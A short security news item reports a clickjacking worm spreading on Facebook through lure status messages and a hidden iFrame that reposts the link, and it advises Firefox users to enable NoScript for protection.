A new worm is spreading rapidly via Facebook. The cause is a problem disclosed weeks ago which Facebook seems unable to fix. As a result, there has been another wave of crafted status messages – this time they refer to a web page which allegedly presents the “101 hottest women in the world”. Those who click on the link are directed to a fairly neutral page with a picture of Jessica Alba and the message “Click here to continue”. At this point nothing bad has happened, however, in the background the web page has opened an iFrame which posts the link to Facebook. This works because users are already logged into Facebook when they read their messages.
The basic problem has been known for several weeks and Facebook has been hit by waves of attacks exploiting the flaw. Those who want to protect themselves can, at least in Firefox, enable the NoScript extension. This extension not only filters out JavaScript, it also detects transparent iFrames and warns of potential “clickjacking attacks”.
Those using IE unfortunately have no protection if they click through and will be compromised.